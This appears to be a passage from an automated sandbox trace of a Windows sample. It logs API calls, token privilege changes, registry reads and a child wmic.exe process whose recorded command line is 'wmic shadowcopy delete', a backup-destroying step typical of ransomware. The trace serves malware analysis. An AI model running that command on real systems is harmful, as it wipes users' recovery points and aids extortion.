GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a605f0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60690) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60910) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60a90) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a604f0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60810) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60670) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a606f0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a607d0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60ab0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a606b0) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60b50) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60b70) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60bd0) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60510) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60930) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60c30) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60830) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60550) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a609d0) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60890) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a608b0) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60570) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60590) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60950) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60970) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60990) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a609b0) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a609f0) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.862] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60a10) returned 1 [0150.862] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61260) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a613a0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61220) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a610a0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61200) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60d80) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60de0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60ec0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61140) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61180) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61020) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60f20) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a610c0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60e40) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60fc0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60ee0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60e60) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a610e0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61280) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61040) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a613e0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60fe0) returned 1 [0150.863] GetProcessHeap () returned 0x1cff6a50000 [0150.863] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61100) returned 1 [0150.864] GetProcessHeap () returned 0x1cff6a50000 [0150.864] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60e80) returned 1 [0150.864] GetProcessHeap () returned 0x1cff6a50000 [0150.864] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61440) returned 1 [0150.864] GetProcessHeap () returned 0x1cff6a50000 [0150.864] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61160) returned 1 [0150.864] GetProcessHeap () returned 0x1cff6a50000 [0150.864] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61060) returned 1 [0150.864] GetProcessHeap () returned 0x1cff6a50000 [0150.864] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a612a0) returned 1 [0150.864] FreeLibrary (hLibModule=0x7ffe54c70000) returned 1 [0150.864] exit (_Code=0) Thread: id = 103 os_tid = 0xfa0 Thread: id = 108 os_tid = 0xfb8 [0149.634] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x1cff6ab8f50 [0149.634] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x1cff6aaf2a0 [0149.634] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1cff6aaeee0 [0149.634] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x1cff6aae390 [0149.634] LocalFree (hMem=0x1cff6ab8f50) returned 0x0 [0149.634] LocalFree (hMem=0x1cff6aae390) returned 0x0 [0149.634] LocalFree (hMem=0x1cff6aaeee0) returned 0x0 [0149.634] LocalFree (hMem=0x1cff6aaf2a0) returned 0x0 Thread: id = 110 os_tid = 0xfc0 [0149.447] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x1cff6ab8f50 [0149.447] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x1cff6aaf030 [0149.447] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x1cff6ab6db0 [0149.447] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x1cff6aacc30 [0149.447] LocalReAlloc (hMem=0x1cff6ab6db0, uBytes=0x20, uFlags=0x2) returned 0x1cff6a77f10 [0149.448] LocalFree (hMem=0x1cff6ab8f50) returned 0x0 [0149.448] LocalFree (hMem=0x1cff6aacc30) returned 0x0 [0149.448] LocalFree (hMem=0x1cff6a77f10) returned 0x0 [0149.448] LocalFree (hMem=0x1cff6aaf030) returned 0x0 Thread: id = 111 os_tid = 0xfc4 Process: id = "19" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x2ae3c000" os_pid = "0xfb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xf30" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 107 os_tid = 0xfb4 [0138.058] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff719480000 [0138.058] __set_app_type (_Type=0x1) [0138.058] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7194bec40) returned 0x0 [0138.058] __wgetmainargs (in: _Argc=0x7ff7194e7258, _Argv=0x7ff7194e7260, _Env=0x7ff7194e7268, _DoWildCard=0, _StartInfo=0x7ff7194e7274 | out: _Argc=0x7ff7194e7258, _Argv=0x7ff7194e7260, _Env=0x7ff7194e7268) returned 0 [0138.060] ??0CHString@@QEAA@XZ () returned 0x7ff7194e79b0 [0138.063] malloc (_Size=0x30) returned 0x1899e8d15a0 [0138.063] malloc (_Size=0x70) returned 0x1899e8d15e0 [0138.063] malloc (_Size=0x50) returned 0x1899e8d1660 [0138.063] malloc (_Size=0x30) returned 0x1899e8d16c0 [0138.063] malloc (_Size=0x48) returned 0x1899e8d1700 [0138.063] malloc (_Size=0x30) returned 0x1899e8d1750 [0138.063] malloc (_Size=0x30) returned 0x1899e8d6c00 [0138.063] ??0CHString@@QEAA@XZ () returned 0x7ff7194e7e60 [0138.063] malloc (_Size=0x30) returned 0x1899e8d6c40 [0138.064] ?Empty@CHString@@QEAAXXZ () returned 0x7ffe5fac674c [0138.064] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7194b7ca0, Add=1) returned 1 [0138.064] _onexit (_Func=0x7ff7194c91c0) returned 0x7ff7194c91c0 [0138.064] _onexit (_Func=0x7ff7194c92a0) returned 0x7ff7194c92a0 [0138.064] _onexit (_Func=0x7ff7194c92e0) returned 0x7ff7194c92e0 [0138.064] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.065] ResolveDelayLoadedAPI () returned 0x7ffe6b14efc0 [0138.065] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0138.455] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0138.505] CoCreateInstance (in: rclsid=0x7ff7194d0608*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7194d0618*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x7ff7194e7840 | out: ppv=0x7ff7194e7840*=0x1899e52bbe0) returned 0x0 [0138.785] GetCurrentProcess () returned 0xffffffffffffffff [0138.785] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26d57ff830 | out: TokenHandle=0x26d57ff830*=0x154) returned 1 [0138.785] GetTokenInformation (in: TokenHandle=0x154, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d57ff828 | out: TokenInformation=0x0, ReturnLength=0x26d57ff828) returned 0 [0138.785] malloc (_Size=0x118) returned 0x1899e8d5a80 [0138.786] GetTokenInformation (in: TokenHandle=0x154, TokenInformationClass=0x3, TokenInformation=0x1899e8d5a80, TokenInformationLength=0x118, ReturnLength=0x26d57ff828 | out: TokenInformation=0x1899e8d5a80, ReturnLength=0x26d57ff828) returned 1 [0138.786] AdjustTokenPrivileges (in: TokenHandle=0x154, DisableAllPrivileges=0, NewState=0x1899e8d5a80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1145975552, Attributes=0x3dca), (Luid.LowPart=0x189, Luid.HighPart=-1634920560, Attributes=0x189), (Luid.LowPart=0x690070, Luid.HighPart=6750318, Attributes=0x340020), (Luid.LowPart=0x650047, Luid.HighPart=7667822, Attributes=0x6e0069), (Luid.LowPart=0x74006e, Luid.HighPart=7077989, Attributes=0x500000), (Luid.LowPart=0x450043, Luid.HighPart=5439571, Attributes=0x52004f))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0138.786] free (_Block=0x1899e8d5a80) [0138.786] CloseHandle (hObject=0x154) returned 1 [0138.787] malloc (_Size=0x40) returned 0x1899e8d5a80 [0138.787] malloc (_Size=0x40) returned 0x1899e8d5ad0 [0138.787] malloc (_Size=0x40) returned 0x1899e8d5b20 [0138.787] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.807] _vsnwprintf (in: _Buffer=0x1899e8d5b20, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26d57ff538 | out: _Buffer="ms_409") returned 6 [0138.807] malloc (_Size=0x20) returned 0x1899e8d5b70 [0138.807] GetComputerNameW (in: lpBuffer=0x1899e8d5b70, nSize=0x26d57ff838 | out: lpBuffer="NQDPDE", nSize=0x26d57ff838) returned 1 [0138.807] lstrlenW (lpString="NQDPDE") returned 6 [0138.807] malloc (_Size=0xe) returned 0x1899e8d1790 [0138.807] lstrlenW (lpString="NQDPDE") returned 6 [0138.807] ResolveDelayLoadedAPI () returned 0x7ffe67926960 [0138.807] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26d57ff830 | out: lpNameBuffer=0x0, nSize=0x26d57ff830) returned 0x0 [0138.809] GetLastError () returned 0xea [0138.809] malloc (_Size=0x1e) returned 0x1899e8d5ba0 [0138.809] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1899e8d5ba0, nSize=0x26d57ff830 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x26d57ff830) returned 0x1 [0138.810] lstrlenW (lpString="") returned 0 [0138.810] lstrlenW (lpString="NQDPDE") returned 6 [0138.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0138.812] lstrlenW (lpString=".") returned 1 [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0138.812] lstrlenW (lpString="LOCALHOST") returned 9 [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0138.812] free (_Block=0x1899e8d1790) [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] malloc (_Size=0xe) returned 0x1899e8d1790 [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] malloc (_Size=0xe) returned 0x1899e8d5bd0 [0138.812] lstrlenW (lpString="NQDPDE") returned 6 [0138.812] malloc (_Size=0x8) returned 0x1899e8d5bf0 [0138.813] malloc (_Size=0x18) returned 0x1899e8d5c10 [0138.813] ResolveDelayLoadedAPI () returned 0x7ffe6ab1cdb0 [0138.822] malloc (_Size=0x30) returned 0x1899e8d5c30 [0138.822] malloc (_Size=0x18) returned 0x1899e8d5c70 [0138.822] SysStringLen (param_1="IDENTIFY") returned 0x8 [0138.822] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0138.822] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0138.822] SysStringLen (param_1="IDENTIFY") returned 0x8 [0138.822] malloc (_Size=0x30) returned 0x1899e8d5c90 [0138.822] malloc (_Size=0x18) returned 0x1899e8d5cd0 [0138.822] SysStringLen (param_1="IMPERSONATE") returned 0xb [0138.822] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0138.822] SysStringLen (param_1="IMPERSONATE") returned 0xb [0138.822] SysStringLen (param_1="IDENTIFY") returned 0x8 [0138.822] SysStringLen (param_1="IDENTIFY") returned 0x8 [0138.822] SysStringLen (param_1="IMPERSONATE") returned 0xb [0138.822] malloc (_Size=0x30) returned 0x1899e8d5cf0 [0138.822] malloc (_Size=0x18) returned 0x1899e8d5d30 [0138.822] SysStringLen (param_1="DELEGATE") returned 0x8 [0138.822] SysStringLen (param_1="IDENTIFY") returned 0x8 [0138.822] SysStringLen (param_1="DELEGATE") returned 0x8 [0138.822] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0138.822] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0138.822] SysStringLen (param_1="DELEGATE") returned 0x8 [0138.822] malloc (_Size=0x30) returned 0x1899e8d5d50 [0138.822] malloc (_Size=0x18) returned 0x1899e8d5d90 [0138.822] malloc (_Size=0x30) returned 0x1899e8d5db0 [0138.822] malloc (_Size=0x18) returned 0x1899e8d5df0 [0138.822] SysStringLen (param_1="NONE") returned 0x4 [0138.822] SysStringLen (param_1="DEFAULT") returned 0x7 [0138.822] SysStringLen (param_1="DEFAULT") returned 0x7 [0138.823] SysStringLen (param_1="NONE") returned 0x4 [0138.823] malloc (_Size=0x30) returned 0x1899e8d5e10 [0138.823] malloc (_Size=0x18) returned 0x1899e8d5e50 [0138.823] SysStringLen (param_1="CONNECT") returned 0x7 [0138.823] SysStringLen (param_1="DEFAULT") returned 0x7 [0138.823] malloc (_Size=0x30) returned 0x1899e8d5e70 [0138.823] malloc (_Size=0x18) returned 0x1899e8d5eb0 [0138.823] SysStringLen (param_1="CALL") returned 0x4 [0138.823] SysStringLen (param_1="DEFAULT") returned 0x7 [0138.823] SysStringLen (param_1="CALL") returned 0x4 [0138.823] SysStringLen (param_1="CONNECT") returned 0x7 [0138.823] malloc (_Size=0x30) returned 0x1899e8d5ed0 [0138.823] malloc (_Size=0x18) returned 0x1899e8d5f10 [0138.823] SysStringLen (param_1="PKT") returned 0x3 [0138.823] SysStringLen (param_1="DEFAULT") returned 0x7 [0138.823] SysStringLen (param_1="PKT") returned 0x3 [0138.823] SysStringLen (param_1="NONE") returned 0x4 [0138.823] SysStringLen (param_1="NONE") returned 0x4 [0138.823] SysStringLen (param_1="PKT") returned 0x3 [0138.823] malloc (_Size=0x30) returned 0x1899e8d5f30 [0138.823] malloc (_Size=0x18) returned 0x1899e8d5f70 [0138.823] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0138.823] SysStringLen (param_1="DEFAULT") returned 0x7 [0138.823] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0138.823] SysStringLen (param_1="NONE") returned 0x4 [0138.823] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0138.823] SysStringLen (param_1="PKT") returned 0x3 [0138.823] SysStringLen (param_1="PKT") returned 0x3 [0138.823] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0138.823] malloc (_Size=0x30) returned 0x1899e8daa50 [0138.823] malloc (_Size=0x18) returned 0x1899e8d5f90 [0138.824] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0138.824] SysStringLen (param_1="DEFAULT") returned 0x7 [0138.824] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0138.824] SysStringLen (param_1="PKT") returned 0x3 [0138.824] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0138.824] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0138.824] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0138.824] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0138.824] malloc (_Size=0x30) returned 0x1899e8da6d0 [0138.824] malloc (_Size=0x40) returned 0x1899e8d5fb0 [0138.824] malloc (_Size=0x20a) returned 0x1899e8db010 [0138.824] GetSystemDirectoryW (in: lpBuffer=0x1899e8db010, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0138.824] free (_Block=0x1899e8db010) [0138.824] malloc (_Size=0x18) returned 0x1899e8d6000 [0138.824] malloc (_Size=0x18) returned 0x1899e8db010 [0138.824] malloc (_Size=0x18) returned 0x1899e8db030 [0138.824] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0138.824] SysStringLen (param_1="\\wbem\\") returned 0x6 [0138.824] free (_Block=0x1899e8d6000) [0138.825] free (_Block=0x1899e8db010) [0138.825] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0138.825] free (_Block=0x1899e8db030) [0138.825] malloc (_Size=0x18) returned 0x1899e8db080 [0138.825] malloc (_Size=0x18) returned 0x1899e8db200 [0138.825] malloc (_Size=0x18) returned 0x1899e8db1c0 [0138.825] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0138.825] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0138.825] free (_Block=0x1899e8db080) [0138.825] free (_Block=0x1899e8db200) [0138.825] GetCurrentThreadId () returned 0xfb4 [0138.825] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26d57ff140 | out: phkResult=0x26d57ff140*=0x15c) returned 0x0 [0138.825] RegQueryValueExW (in: hKey=0x15c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26d57ff190, lpcbData=0x26d57ff130*=0x400 | out: lpType=0x0, lpData=0x26d57ff190*=0x30, lpcbData=0x26d57ff130*=0x4) returned 0x0 [0138.825] _wcsicmp (_String1="0", _String2="1") returned -1 [0138.825] _wcsicmp (_String1="0", _String2="2") returned -2 [0138.826] RegQueryValueExW (in: hKey=0x15c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26d57ff130*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26d57ff130*=0x42) returned 0x0 [0138.826] malloc (_Size=0x86) returned 0x1899e8db420 [0138.826] RegQueryValueExW (in: hKey=0x15c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x1899e8db420, lpcbData=0x26d57ff130*=0x42 | out: lpType=0x0, lpData=0x1899e8db420*=0x25, lpcbData=0x26d57ff130*=0x42) returned 0x0 [0138.826] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0138.826] malloc (_Size=0x42) returned 0x1899e8db4b0 [0138.826] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0138.826] RegQueryValueExW (in: hKey=0x15c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26d57ff190, lpcbData=0x26d57ff130*=0x400 | out: lpType=0x0, lpData=0x26d57ff190*=0x36, lpcbData=0x26d57ff130*=0xc) returned 0x0 [0138.826] _wtol (_String="65536") returned 65536 [0138.826] free (_Block=0x1899e8db420) [0138.826] RegCloseKey (hKey=0x0) returned 0x6 [0138.826] CoCreateInstance (in: rclsid=0x7ff7194d0668*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, 